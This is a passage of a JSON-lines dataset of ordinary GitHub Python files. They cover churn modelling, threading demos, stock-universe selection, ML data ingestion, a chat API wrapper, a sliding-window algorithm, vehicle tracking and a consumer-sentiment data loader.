name)\n\n if not os.path.exists(path):\n raise Exception(\"Preset file does not exist\")\n\n with open(path, 'r') as stream:\n try:\n preset = yaml.safe_load(stream)\n except yaml.YAMLError as exc:\n raise Exception(\"Error loading preset file: \" + str(exc))\n\n config = preset['config']\n\n name = preset['name']\n role = preset['role']\n agent_type = config['type']\n\n return create_agent_by_type(name, role, config, agent_type)\n","repo_name":"SherifNeamatalla/hal9000_world","sub_path":"agents/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2588,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"36337865101","text":"import pandas as pd\r\nimport numpy as np\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn.tree import export_graphviz\r\nfrom sklearn import tree\r\nfrom io import StringIO\r\nfrom sklearn.preprocessing import LabelEncoder\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom matplotlib import pyplot as plt\r\nimport graphviz\r\n\r\ntc = pd.read_csv('./customer_churn.csv')\r\n\r\n# print(\"Row:\", tc.shape[0])\r\n# print(\"\\nColumn:\", tc.shape[1])\r\n# print(\"\\nFeatures: \\n\", tc.columns.tolist())\r\n# print(\"\\nMissing Values: \\n\", tc.isnull().sum().values.sum())\r\n# print(\"\\nUnique Values: \\n\", tc.nunique())\r\n\r\ntc['TotalCharges'] = tc['TotalCharges'].replace(\" \", np.nan)\r\ntc =tc[tc['TotalCharges'].notnull()]\r\ntc= tc.reset_index()[tc.columns]\r\ntc['TotalCharges'] = tc['TotalCharges'].astype(float)\r\n# tc.head()\r\n\r\nreplace_cols = ['OnlineSecurity', 'OnlineBackup', 'DeviceProtection',\r\n 'TechSupport','StreamingTV', 'StreamingMovies']\r\nfor i in replace_cols:\r\n tc[i] = tc[i].replace({\"No internet service\" : \"No\"})\r\n# print(tc['OnlineSecurity'].head(15))\r\n\r\ntc[\"SeniorCitizen\"] = tc[\"SeniorCitizen\"].replace({1:\"Yes\", 0:\"No\"})\r\n\r\ndef tenure_cat(tc):\r\n \r\n if tc[\"tenure\"] <= 12:\r\n return \"Tenure_0-12\"\r\n \r\n elif (tc[\"tenure\"] > 12) & (tc[\"tenure\"] <= 24 ):\r\n return \"Tenure_12-24\"\r\n \r\n elif (tc[\"tenure\"] > 24) & (tc[\"tenure\"] <= 48) :\r\n return 
\"Tenure_24-48\"\r\n \r\n elif (tc[\"tenure\"] > 48) & (tc[\"tenure\"] <= 60) :\r\n return \"Tenure_48-60\"\r\n \r\n elif tc[\"tenure\"] > 60 :\r\n return \"Tenure_gt_60\"\r\n \r\ntc[\"tenure_grp\"] = tc.apply(lambda tc:tenure_cat(tc),\r\n axis = 1)\r\n\r\n#customer id col\r\nId_col = ['customerID']\r\n#Target columns\r\ntarget_col = [\"Churn\"]\r\n#categorical columns\r\ncat_cols = tc.nunique()[tc.nunique() < 6].keys().tolist()\r\ncat_cols = [x for x in cat_cols if x not in target_col]\r\n# print(cat_cols)\r\n\r\n#numerical columns\r\nnum_cols = [x for x in tc.columns if x not in cat_cols + target_col + Id_col]\r\n\r\n#Binary columns with 2 values\r\nbin_cols = tc.nunique()[tc.nunique() == 2].keys().tolist()\r\n# print(\" \")\r\n\r\nmulti_cols = [i for i in cat_cols if i not in bin_cols]\r\n\r\n#Label encoding Binary columns\r\nle = LabelEncoder()\r\n# print(bin_cols)\r\nfor i in bin_cols :\r\n # print(i)\r\n tc[i] = le.fit_transform(tc[i])\r\n \r\n#Duplicating columns for multi value columns\r\ntc = pd.get_dummies(data = tc,columns = multi_cols )\r\n# print(tc.head())\r\n\r\nstd = StandardScaler()\r\nscaled = std.fit_transform(tc[num_cols])\r\nscaled = pd.DataFrame(scaled,columns=num_cols)\r\n# print(scaled)\r\n\r\ntc = tc.drop(columns=['tenure_grp_Tenure_12-24', 'tenure_grp_Tenure_0-12', 'tenure_grp_Tenure_24-48', 'tenure_grp_Tenure_48-60', 'tenure_grp_Tenure_gt_60'])\r\n\r\ndf_tc_og = tc.copy()\r\ntc = tc.drop(columns = num_cols,axis = 1)\r\ntc = tc.merge(scaled,left_index=True,right_index=True,how = \"left\")\r\n\r\nbin_cols = tc.nunique()[tc.nunique() == 2].keys().tolist()\r\nle = LabelEncoder()\r\n# print(bin_cols)\r\nfor i in bin_cols :\r\n # print(i)\r\n tc[i] = le.fit_transform(tc[i])\r\n \r\n# print(tc.head())\r\n# print(tc.columns)\r\n\r\nId_col = ['customerID']\r\ntarget_col = ['Churn']\r\n\r\n# print(tc[\"tenure_grp\"])\r\n\r\ncat_cols = tc.nunique()[tc.nunique() < 6]\r\n# print(cat_cols)\r\n\r\ncols = [i for i in tc.columns if i not in Id_col + target_col ]\r\n# print(cols)\r\n\r\nx = df_tc_og[cols]\r\ny = df_tc_og[target_col]\r\n\r\nx_train, x_test, y_train, y_test = train_test_split(x,y,test_size = 0.2)\r\n\r\n# print(tc)\r\nmodel_dt_2 = DecisionTreeClassifier(random_state = 1, max_depth = 2)\r\nmodel_dt_2.fit(x_train, y_train)\r\nmodel_dt_2_score_train = model_dt_2.score(x_train, y_train)\r\nprint(\"Training Score depth-2 : \", model_dt_2_score_train)\r\nmodel_dt_2_score_test = model_dt_2.score(x_test, y_test)\r\nprint(\"Testing Score depth-2 : \", model_dt_2_score_test)\r\n\r\n# depth-8\r\nmodel_dt_8 = DecisionTreeClassifier(random_state=1, max_depth=8, criterion = \"entropy\")\r\nmodel_dt_8.fit(x_train, y_train)\r\nmodel_dt_8_score_train = model_dt_8.score(x_train, y_train)\r\nprint(\"Training score depth-8 : \",model_dt_8_score_train)\r\nmodel_dt_8_score_test = model_dt_8.score(x_test, y_test)\r\nprint(\"Testing score depth-8 : \",model_dt_8_score_test)\r\n\r\ndot_data = tree.export_graphviz(model_dt_8, out_file=None, \r\n feature_names=cols, \r\n class_names=target_col,\r\n filled=True)\r\n\r\n# Draw graph\r\ngraph = graphviz.Source(dot_data, format=\"png\") \r\ngraph","repo_name":"RathodKaransinh/Telco-Customer-Churn-Analysis","sub_path":"cust_churn_analysis.py","file_name":"cust_churn_analysis.py","file_ext":"py","file_size_in_byte":4558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27572327847","text":"from threading import Thread\r\nfrom random import randint\r\nfrom time import sleep\r\n\r\n\r\ndef 
main():\r\n print(\"Start Fishing Trip.\")\r\n fish_on = randint(1, 10)\r\n\r\n setup_thread = Thread(target=setup_rig)\r\n cast_thread = Thread(target=cast_line)\r\n hook_thread = Thread(target=hook_fish, args=(fish_on,))\r\n\r\n setup_thread.start()\r\n cast_thread.start()\r\n hook_thread.start()\r\n\r\n setup_thread.join()\r\n cast_thread.join()\r\n hook_thread.join()\r\n\r\n if fish_on < 4:\r\n print(\"That didn't take long.\")\r\n elif fish_on in range(4, 8):\r\n print(\"Good day to fish.\")\r\n else:\r\n print(\"Seemed like nothing was going to bite today.\")\r\n\r\n print(\"Fishing Trip complete!\")\r\n\r\n\r\ndef setup_rig():\r\n print(\"Setup saltwater fishing rig.\")\r\n\r\n\r\ndef cast_line():\r\n print(\"Cast line and wait...\")\r\n\r\n\r\ndef hook_fish(wait):\r\n sleep(wait)\r\n print(\"Set hook and reel in fish.\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"k3rl15/skill_captain_python_advanced","sub_path":"Day 5/concurrency_multithreading.py","file_name":"concurrency_multithreading.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5185104221","text":"from abc import ABCMeta, abstractmethod\nfrom dateutil import rrule\nimport datetime\nimport logging\n\nimport numpy as np\nimport pandas as pd\n\nimport alphai_calendars as mcal\n\nfrom alphai_feature_generation.cleaning import (\n select_between_timestamps,\n remove_duplicated_symbols_ohlcv,\n slice_data_dict\n)\n\nlogger = logging.getLogger(__name__)\n\nMETHOD_FIXED = 'fixed'\nMETHOD_ANNUAL = 'annual'\nMETHOD_LIQUIDITY = 'liquidity'\nMETHOD_LIQUIDITY_DAY = 'liquidity_day'\nMETHOD_FIXED_HISTORICAL = 'fixed_historical'\nHISTORICAL_UNIVERSE_COLUMNS = ('start_date', 'end_date', 'assets')\nUPDATE_FREQUENCIES = ('daily', 'weekly', 'monthly', 'yearly')\nFREQUENCY_RRULE_MAP = {'daily': rrule.DAILY, 'weekly': rrule.WEEKLY, 'monthly': rrule.MONTHLY, 'yearly': rrule.YEARLY}\nOHLCV = ('open', 'high', 'low', 'close', 'volume')\n\n\nclass AbstractUniverseProvider(metaclass=ABCMeta):\n @abstractmethod\n def get_historical_universes(self, data_dict):\n \"\"\"\n Get a dataframe with arrays of all the relevant equities between two dates, categorised by date ranges.\n :param data_dict: dict of dataframes\n :return: Dataframe with three columns ['start_date', 'end_date', 'assets']\n \"\"\"\n raise NotImplementedError\n\n\nclass VolumeUniverseProvider(AbstractUniverseProvider):\n def __init__(self,\n n_assets,\n ndays_window,\n update_frequency,\n calendar_name,\n dropna\n ):\n \"\"\"\n Provides assets according to an input universe dictionary indexed by year\n :param nassets: Number of assets to select\n :param ndays_window: Number of days over which to calculate the period liquidity\n :param update_frequency: str in ['daily', 'weekly', 'monthly', 'yearly']: updates of the historical universe\n :param exchange: the name of the calendar\n :param dropna: if True drops columns containing any nan after gaps-filling\n\n \"\"\"\n self._nassets = n_assets\n self._ndays_window = ndays_window\n self._update_frequency = update_frequency\n self._dropna = dropna\n\n self._exchange_calendar = mcal.get_calendar(calendar_name)\n\n self._nminutes_window = self._ndays_window * self._exchange_calendar.get_minutes_in_one_day()\n self._rrule = FREQUENCY_RRULE_MAP[self._update_frequency]\n\n def _get_universe_at(self, date, data_dict):\n assert (type(date) == datetime.date) or (type(date) == pd.Timestamp)\n\n selected_daily_data_dict = 
slice_data_dict(data_dict, slice_start=-self._ndays_window)\n assert len(selected_daily_data_dict['volume']) == self._ndays_window\n\n no_duplicates_data_dict = remove_duplicated_symbols_ohlcv(selected_daily_data_dict)\n universe_at_date = np.array(list(no_duplicates_data_dict['volume'].sum().sort_values(ascending=False).index))\n\n return universe_at_date[:self._nassets]\n\n def get_historical_universes(self, data_dict):\n\n historical_universes = pd.DataFrame(columns=HISTORICAL_UNIVERSE_COLUMNS)\n relevant_dict = {k: data_dict[k] for k in ('volume', 'close')}\n relevant_dict['volume'] = relevant_dict['volume'].resample('1D').sum().dropna(axis=[0, 1], how='all')\n relevant_dict['close'] = relevant_dict['close'].resample('1D').last().dropna(axis=[0, 1], how='all')\n\n data_timezone = relevant_dict['volume'].index.tz\n start_date = relevant_dict['volume'].index[self._ndays_window + 1]\n end_date = relevant_dict['volume'].index[-1]\n\n rrule_dates = list(rrule.rrule(self._rrule, dtstart=start_date, until=end_date))\n rrule_dates[-1] = end_date\n\n if len(rrule_dates) > 1:\n for idx, (period_start_date, period_end_date) in enumerate(zip(rrule_dates[:-1], rrule_dates[1:])):\n logger.debug('Calculating historical universe from: {} - {}'.format(str(period_start_date),\n str(period_end_date)))\n\n end_timestamp = pd.Timestamp(period_start_date, tz=data_timezone)\n\n historical_universes.loc[idx] = [\n period_start_date.date(),\n period_end_date.date(),\n self._get_universe_at(period_start_date.date(),\n select_between_timestamps(relevant_dict, end_timestamp=end_timestamp))\n ]\n historical_universes.iloc[-1]['end_date'] = end_date.date()\n\n elif len(rrule_dates) == 1:\n end_timestamp = pd.Timestamp(start_date, tz=data_timezone)\n historical_universes.loc[0] = [\n start_date.date(),\n end_date.date(),\n self._get_universe_at(start_date,\n select_between_timestamps(relevant_dict, end_timestamp=end_timestamp))\n ]\n return historical_universes\n","repo_name":"alpha-i/library-feature-generation","sub_path":"alphai_feature_generation/universe.py","file_name":"universe.py","file_ext":"py","file_size_in_byte":4954,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"33242643589","text":"import os\r\nimport sys\r\nfrom src.exceptions import CustomException\r\nfrom src.logger import logging\r\nimport pandas as pd\r\nfrom sklearn.model_selection import train_test_split\r\nfrom src.components.data_transformation import DataTransformation, DataTransformationConfig\r\nfrom dataclasses import dataclass\r\nfrom src.components.model_training import Trained_Model\r\n\r\n@dataclass\r\nclass DataIngestionConf:\r\n train_data_path = os.path.join('artifacts','train.csv')\r\n test_data_path = os.path.join('artifacts','test.csv')\r\n raw_data_path = os.path.join('artifacts','raw.csv')\r\n\r\nclass DataIngestion:\r\n def __init__(self):\r\n self.ingestion_conf = DataIngestionConf()\r\n \r\n def initiate_data(self):\r\n logging.info(\"We have started the data ingestion part now...\")\r\n try:\r\n df = pd.read_csv(\"C:/Users/Yashkumar Dubey/Documents/Desktop1/youtube/ML CICD Pipe/notebooks/data/laptop_data_cleaned.csv\")\r\n logging.info(\"Reaing the Dataset as Dataframe...\")\r\n os.makedirs(os.path.dirname(self.ingestion_conf.train_data_path),exist_ok=True)\r\n df.to_csv(self.ingestion_conf.raw_data_path,index=False,header=True)\r\n logging.info(\"Train test split is initiated...\")\r\n train_set,test_set = train_test_split(df,test_size=0.2,random_state=52)\r\n 
train_set.to_csv(self.ingestion_conf.train_data_path,index=False,header=True)\r\n test_set.to_csv(self.ingestion_conf.test_data_path,index=False,header=True)\r\n logging.info(\"Ingestion is completed\")\r\n return(\r\n self.ingestion_conf.train_data_path,\r\n self.ingestion_conf.test_data_path\r\n\r\n )\r\n except Exception as e:\r\n raise CustomException(e,sys)\r\n \r\n\r\nif __name__==\"__main__\":\r\n obj = DataIngestion()\r\n train_data,test_data = obj.initiate_data()\r\n transform = DataTransformation()\r\n new_train_data,new_test_data,new_y_train,new_y_test = transform.initiate_data_transformation(train_data,test_data)\r\n modeltrainer=Trained_Model()\r\n print(modeltrainer.initialise_training(new_train_data,new_test_data,new_y_train,new_y_test))\r\n\r\n\r\n","repo_name":"YashAPro1/ML-CICD-Pipeline","sub_path":"src/components/data_ingestion.py","file_name":"data_ingestion.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"6623525131","text":"import datetime\n\n# import classes\nfrom app.models.base_model import BaseModel\nfrom app.models import db\n\n\nclass Booth(db.Model, BaseModel):\n\t# table name\n\t__tablename__ = 'booths'\n\t# displayed fields\n\tvisible = ['id', 'user_id', 'stage_id', 'points', 'summary', 'type', 'logo_url', 'url', 'name', 'created_at', 'updated_at']\n\n\t# columns definitions\n\tid = db.Column(db.Integer, primary_key=True)\n\tuser_id = db.Column(\n\t\tdb.String(40),\n\t\tdb.ForeignKey('users.id'),\n\t\tnullable=True\n\t)\n\tuser = db.relationship('User')\n\tstage_id = db.Column(\n\t\tdb.String(40),\n\t\tdb.ForeignKey('stages.id')\n\t)\n\tstage = db.relationship('Stage')\n\tsummary = db.Column(db.Text)\n\ttype = db.Column(db.String)\n\tpoints = db.Column(db.Integer)\n\tname = db.Column(db.String(255))\n\turl = db.Column(db.String(255))\n\tlogo_url = db.Column(db.String(255))\n\tcreated_at = db.Column(db.DateTime)\n\tupdated_at = db.Column(db.DateTime)\n\n\tdef __init__(self):\n\t\tself.created_at = datetime.datetime.now()\n\t\tself.updated_at = datetime.datetime.now()\n\t\tself.summary = ''\n\t\tself.points = 0\n","repo_name":"devsummit/backend","sub_path":"app/models/booth.py","file_name":"booth.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"16"} +{"seq_id":"6576364145","text":"'''Have a conversation with Aria, powered by OpenAI chat completion'''\n\nimport json\nimport openai\n\nclass Conversation:\n '''Object-class containing the ongoing conversation'''\n\n def __init__(self):\n '''Constructs the conversation with the necessary settings'''\n self.reset()\n with open('./data/keys.json', encoding='UTF-8') as keys:\n openai.api_key = json.load(keys)['OPEN_AI_KEY']\n\n def get_response(self, prompt: str):\n '''Sends a message to the assistant and gets the response'''\n try:\n self.messages.append({'role': 'user', 'content': prompt})\n completion = openai.ChatCompletion.create(\n model=self.model,\n messages=self.messages,\n max_tokens=self.max_tokens\n )\n self.messages.append(completion.choices[0]['message'])\n return completion.choices[0]['message']['content']\n except Exception:\n return \"I'm sorry, I don't understand.\"\n\n def reset(self):\n '''Clears all messages and sets settings back to default'''\n with open('./data/conversationSettings.json', encoding='UTF-8') as settings:\n data = json.load(settings)\n self.messages = data['settings']\n self.model = 
data['model']\n self.temperature = data['temperature']\n self.max_tokens = data['max_tokens']\n\nif __name__ == '__main__':\n chat = Conversation()\n print(chat.get_response(\"Whats your name\"))\n","repo_name":"AJWestley/Aria","sub_path":"Skills/conversation.py","file_name":"conversation.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"71970626249","text":"\"\"\"\nYou are given an array of integers nums, there is a sliding window of size k which is moving from the very left of the array to the very right.\nYou can only see the k numbers in the window. Each time the sliding window moves right by one position.\n\nReturn the max sliding window.\nnums = [1,3,-1,4,5], k = 3\n\n[3,1,-1,4,5] => [3,4,-1,4,5]\n\n[0]=0\n[1]=1\n[2]=2\n\nidx=0 => 1\nleft=1 => 3\n\nidx=0 => 3\nleft=1 => 1\n\nha[0]=1\nha[1]=0\nha[3]=1\n\n\n\n\n\"\"\"\nimport math\nfrom typing import List\n\nimport test2\n\n\nclass Solution:\n\n def maxSlidingWindow(self, nums: List[int], k: int) -> List[int]:\n if k == 1:\n return nums\n if k == len(nums):\n return [max(nums)]\n\n handleByOrgId = {}\n handleByCurId = {}\n\n def heapDown(idx):\n left = 2 * idx + 1\n right = 2 * idx + 2\n maxIdx = idx\n\n if not (left >= k and right >= k):\n if left < k and nums[maxIdx] < nums[left]:\n maxIdx = left\n if right < k and nums[maxIdx] < nums[right]:\n maxIdx = right\n if maxIdx != idx:\n temp = nums[idx]\n nums[idx] = nums[maxIdx]\n nums[maxIdx] = temp\n\n orgIdForIdx = handleByCurId[idx]\n handleByOrgId[orgIdForIdx] = maxIdx\n\n orgIdForMaxId = handleByCurId[maxIdx]\n handleByOrgId[orgIdForMaxId] = idx\n\n handleByCurId[idx] = orgIdForMaxId\n handleByCurId[maxIdx] = orgIdForIdx\n\n heapDown(maxIdx)\n\n def heapUp(idx):\n while ((idx - 1) / 2) >= 1 and idx > 1:\n parent = math.floor((idx - 1) / 2)\n if nums[parent] < nums[idx]:\n temp = nums[idx]\n nums[idx] = nums[parent]\n nums[parent] = temp\n\n orgIdForIdx = handleByCurId[idx]\n handleByOrgId[orgIdForIdx] = parent\n\n orgIdForParent = handleByCurId[parent]\n handleByOrgId[orgIdForParent] = idx\n\n handleByCurId[idx] = orgIdForParent\n handleByCurId[parent] = orgIdForIdx\n idx = parent\n else:\n break\n\n def heapUpOrDown(idx):\n parent = math.floor((idx - 1) / 2)\n if parent >= 1 and nums[parent] < nums[idx]:\n heapUp(idx)\n else:\n heapDown(idx)\n\n def heapify():\n j = k\n while j > 0:\n heapDown(j)\n j -= 1\n\n firstMaxVal = 0\n i = 0\n while i < k:\n if i != 0:\n handleByOrgId[i] = i\n handleByCurId[i] = i\n firstMaxVal = max(firstMaxVal, nums[i])\n i += 1\n\n returnList = [firstMaxVal]\n handleByOrgId[k] = k\n handleByCurId[k] = k\n heapify()\n\n p = k + 1\n q = 1\n while p < len(nums):\n returnList.append(nums[1])\n updateIdx = handleByOrgId[q]\n\n q = q + 1\n nums[updateIdx] = nums[p]\n handleByOrgId[p] = updateIdx\n handleByCurId[updateIdx] = p\n heapUpOrDown(updateIdx)\n p = p + 1\n\n returnList.append(nums[1])\n return returnList\n\n\nnums = [1,3,-1,-3,5,3,6,7]\nk =3\nsl = Solution()\nprint(sl.maxSlidingWindow(nums, k))\n","repo_name":"shashiram/Data-Structures-and-Algorithms","sub_path":"MaxSlidingWindow.py","file_name":"MaxSlidingWindow.py","file_ext":"py","file_size_in_byte":3496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42332301545","text":"import json\nfrom pathlib import Path\n\nfrom OTVision.config import CONFIG\nfrom OTVision.helpers.files import denormalize, get_files\nfrom OTVision.helpers.log 
import log\n\nfrom .iou import track_iou\nimport torch\nimport os\n\nfrom OTVision.siam import NeuralNetwork\nfrom OTVision.track.cluster_track import dbscan\n\n\ndef main(\n paths,\n yolo_mode=\"spp\", # Why yolo mode?\n sigma_l=CONFIG[\"TRACK\"][\"IOU\"][\"SIGMA_L\"],\n sigma_h=CONFIG[\"TRACK\"][\"IOU\"][\"SIGMA_H\"],\n sigma_iou=CONFIG[\"TRACK\"][\"IOU\"][\"SIGMA_IOU\"],\n t_min=CONFIG[\"TRACK\"][\"IOU\"][\"T_MIN\"],\n t_miss_max=CONFIG[\"TRACK\"][\"IOU\"][\"T_MISS_MAX\"],\n overwrite=CONFIG[\"TRACK\"][\"OVERWRITE\"],\n debug: bool = CONFIG[\"TRACK\"][\"DEBUG\"],\n clustering=CONFIG[\"TRACK\"][\"CLUSTERING\"],\n):\n log.info(\"Start tracking\")\n if debug:\n log.setLevel(\"DEBUG\")\n log.debug(\"Debug mode on\")\n\n filetype = CONFIG[\"DEFAULT_FILETYPE\"][\"DETECT\"]\n detections_files = get_files(paths, filetype)\n\n # kav 200922\n model_siam = NeuralNetwork()\n model_siam.eval()\n if torch.cuda.is_available():\n model_siam.load_state_dict(torch.load('checkpoints/big.pth', map_location=torch.device('cuda:0')))\n model_siam = model_siam.cuda()\n else:\n model_siam.load_state_dict(torch.load('checkpoints/big.pth', map_location=torch.device('cpu')))\n model_siam = model_siam.cpu()\n\n\n\n for detections_file in detections_files:\n log.info(f\"Try tracking {detections_file}\")\n\n try:\n with open(detections_file) as f:\n detections = json.load(f)\n log.info(f\"{filetype} read\")\n\n detections_denormalized = denormalize(detections)\n log.info(\"Detections denormalized\")\n\n dir = os.path.dirname(detections_file)\n file_name = os.path.basename(detections_file).split('.')[0]\n dir_features = os.path.join(dir, file_name + '_features')\n\n tracks_px, trajectories_geojson = track(\n detections=detections_denormalized,\n yolo_mode=yolo_mode,\n sigma_l=sigma_l,\n sigma_h=sigma_h,\n sigma_iou=sigma_iou,\n t_min=t_min,\n t_miss_max=t_miss_max,\n model_siam=model_siam, # kav 200922\n dir_features=dir_features,\n )\n\n log.info(\"Detections tracked\")\n if clustering:\n tracks_px = dbscan(tracks_px)\n # print(bad_id)\n\n write(\n tracks_px=tracks_px,\n detections_file=detections_file,\n overwrite=overwrite,\n )\n except OSError as oe:\n log.error(\n (\n f'Could not open \"{detections_file}\". 
'\n f\"Following exception occured: {str(oe)}\"\n )\n )\n except json.JSONDecodeError as je:\n log.error(\n (\n f'Unable to decode \"{detections_file}\" as JSON.'\n f\"Following exception occured: {str(je)}\"\n )\n )\n\n\ndef track(\n detections,\n yolo_mode=\"spp\",\n sigma_l=CONFIG[\"TRACK\"][\"IOU\"][\"SIGMA_L\"],\n sigma_h=CONFIG[\"TRACK\"][\"IOU\"][\"SIGMA_H\"],\n sigma_iou=CONFIG[\"TRACK\"][\"IOU\"][\"SIGMA_IOU\"],\n t_min=CONFIG[\"TRACK\"][\"IOU\"][\"T_MIN\"],\n t_miss_max=CONFIG[\"TRACK\"][\"IOU\"][\"T_MISS_MAX\"],\n model_siam=None, # kav 200922\n dir_features='',\n):\n new_detections, trajectories_geojson, vehIDs_finished = track_iou(\n detections=detections[\"data\"],\n sigma_l=sigma_l,\n sigma_h=sigma_h,\n sigma_iou=sigma_iou,\n t_min=t_min,\n t_miss_max=t_miss_max,\n model_siam=model_siam, # kav 200922\n w_frame=detections['vid_config']['width'],\n h_frame=detections['vid_config']['height'],\n dir_features=dir_features,\n )\n\n trk_config = {\n \"yolo_mode\": yolo_mode,\n \"tracker\": \"IOU\",\n \"sigma_l\": sigma_l,\n \"sigma_h\": sigma_h,\n \"sigma_iou\": sigma_iou,\n \"t_min\": t_min,\n \"t_miss_max\": t_miss_max,\n }\n\n tracks_px = {\n \"vid_config\": detections[\"vid_config\"],\n \"det_config\": detections[\"det_config\"],\n \"trk_config\": trk_config,\n \"data\": new_detections,\n }\n\n return tracks_px, trajectories_geojson\n\n\n# TODO: Implement overwrite as in detect, maybe refactor?\ndef write(\n tracks_px,\n detections_file,\n overwrite=CONFIG[\"TRACK\"][\"OVERWRITE\"],\n):\n # ?: Check overwrite before tracking instead of before writing tracking?\n # TODO: Export also as csv, trj and alternative json\n tracks_file = Path(detections_file).with_suffix(CONFIG[\"DEFAULT_FILETYPE\"][\"TRACK\"])\n tracks_file_already_exists = tracks_file.is_file()\n if overwrite or not tracks_file_already_exists:\n # Write JSON\n with open(tracks_file, \"w\") as f:\n json.dump(tracks_px, f, indent=4)\n if tracks_file_already_exists:\n log.info(f\"{tracks_file} overwritten\")\n else:\n log.info(f\"{tracks_file} file written\")\n else:\n log.info(f\"{tracks_file} already exists. To overwrite, set overwrite=True\")\n","repo_name":"Kommunarus/otv","sub_path":"OTVision/track/track.py","file_name":"track.py","file_ext":"py","file_size_in_byte":5195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"23716253286","text":"import pandas as pd\nfrom sklearn.model_selection import train_test_split\nimport pymysql\nimport numpy as np\nimport pickle\n\n\"\"\"\nStep1. 
data load\n\"\"\"\ndef loading_data():\n ## DB connection\n conn = pymysql.connect(host = \"127.0.0.1\", user = [USER], passwd = [PASSWORD], db = [DATABASE], cursorclass = pymysql.cursors.DictCursor)\n cur = conn.cursor()\n \n cur.execute(\"show databases\")\n cur.execute(\"use crawling\")\n\n ## Table data loading\n # news\n query = \"\"\" \n select * from news_counting;\n \"\"\"\n cur.execute(query)\n news_df = pd.DataFrame(list(cur.fetchall())).drop(['id'], axis=1)\n news_df.head()\n\n # portal\n # 카카오변수 제외, 구글/네이버를 활용하기위해 \n # 네이버 변수가 값을 갖는 2016년 1월부터 데이터 사용\n query = \"\"\" \n select * from portal_trends_ratio ;\n \"\"\"\n cur.execute(query)\n portal_df = pd.DataFrame(list(cur.fetchall()))\n portal_df = portal_df[['year', 'month', 'day', 'google', 'naver']][17:]\n\n ## response y: CCSI(소비자심리지수)\n query = \"\"\" \n select * from ccsi ;\n \"\"\"\n cur.execute(query)\n conn.close()\n cur.close()\n # X와 기간을 맞춤\n ccsi = pd.DataFrame(list(cur.fetchall()))[4:].reset_index(drop = True)\n\n return news_df, portal_df, ccsi\n\n\n\n\"\"\"\nStep2. X, y dataframe\n\"\"\"\n\n# 달의 마지막주인지 확인하는 function\ndef isLastWeekOfThisMonth(X, index):\n if(index == (len(X) - 1)):\n return True\n if ( X.iloc[index].month != X.iloc[index + 1].month ):\n return True\n return False\n\n# 달의 마지막 주차이면, 해당 달의 데이터들의 평균값들을 하나의 record로 갖는 dataframe 생성\ndef getYdataframe(X, y):\n count = 0\n y_weekly = pd.DataFrame()\n\n for i in range(len(X)):\n count+= 1\n\n if ( isLastWeekOfThisMonth(X, i) ):\n a = np.where((y.month == X.iloc[i].month) & (y.year == X.iloc[i].year ))[0]\n present_ccsi = float(y.iloc[a].ccsi)\n \n past_ccsi = float(y.iloc[a-1].ccsi)\n sub = present_ccsi - past_ccsi\n \n for index in range(count):\n n = ((index+1) / count)*(sub)+past_ccsi\n record = pd.Series([int(X.iloc[i].year), int(X.iloc[i].month), int(X.iloc[i-(count-index)+1].day), n])\n row_df = pd.DataFrame([record])\n y_weekly = pd.concat([y_weekly, row_df], ignore_index=True)\n \n \n count = 0\n \n return y_weekly\n\n# df column명 정해주는 function\ndef renameXdataframe(X):\n X.rename(columns={0: 'year', 1: 'month',2:'day', 3: 'keyword1', 4: 'keyword2', 5: 'keyword3', 6: 'keyword4', 7: 'keyword5', 8: 'google', 9: 'naver'}, inplace = True)\n return X.astype({\"year\": int, \"month\": int, \"day\": int})\n\n\ndef renameYdataframe(y):\n y.rename(columns={0: 'year', 1: 'month',2:'day', 3: 'ccsi'}, inplace = True)\n return y.astype({\"year\": int, \"month\": int, \"day\": int})\n\n\ndef getX_y_dateframe():\n news_df, portal_df, ccsi = loading_data()\n predictors = pd.merge(news_df, portal_df)\n\n y_df = getYdataframe(predictors, ccsi)\n y_df = renameYdataframe(y_df)\n X_df = renameXdataframe(predictors)\n \n return X_df, predictors, y_df\n\n\"\"\"\nStep3. 
Modeling\n- split train and test set\n\"\"\"\ndef getTrainTestSet(X_df, ccsi):\n df = pd.merge(X_df, ccsi)\n X = df[['keyword1', 'keyword2', 'keyword3', 'keyword4', 'keyword5', 'google', 'naver']] # X: 예측변수 dataframe\n y = df[['ccsi']] # y: 반응변수 dataframe\n\n # CV를 활용하기 위해, validate set은 따로 분할하지 않는다.\n X_train, X_test, y_train, y_test = train_test_split(X, y, train_size=0.8, test_size=0.2, shuffle=False)\n\n return X_train, X_test, y_train, y_test\n \n\n###################### main ######################\nif __name__ == \"__main__\":\n X_df, predictors, ccsi = getX_y_dateframe()\n X_train, X_test, y_train, y_test = getTrainTestSet(X_df, ccsi) \n pickle.dump(X_train, open('./dataset/dataset_interpolation/X_train.pkl','wb'))\n pickle.dump(X_test, open('./dataset/dataset_interpolation/X_test.pkl','wb'))\n pickle.dump(y_train, open('./dataset/dataset_interpolation/y_train.pkl','wb'))\n pickle.dump(y_test, open('./dataset/dataset_interpolation/y_test.pkl','wb'))\n pickle.dump(ccsi, open('./dataset/dataset_interpolation/ccsi.pkl','wb'))\n pickle.dump(predictors, 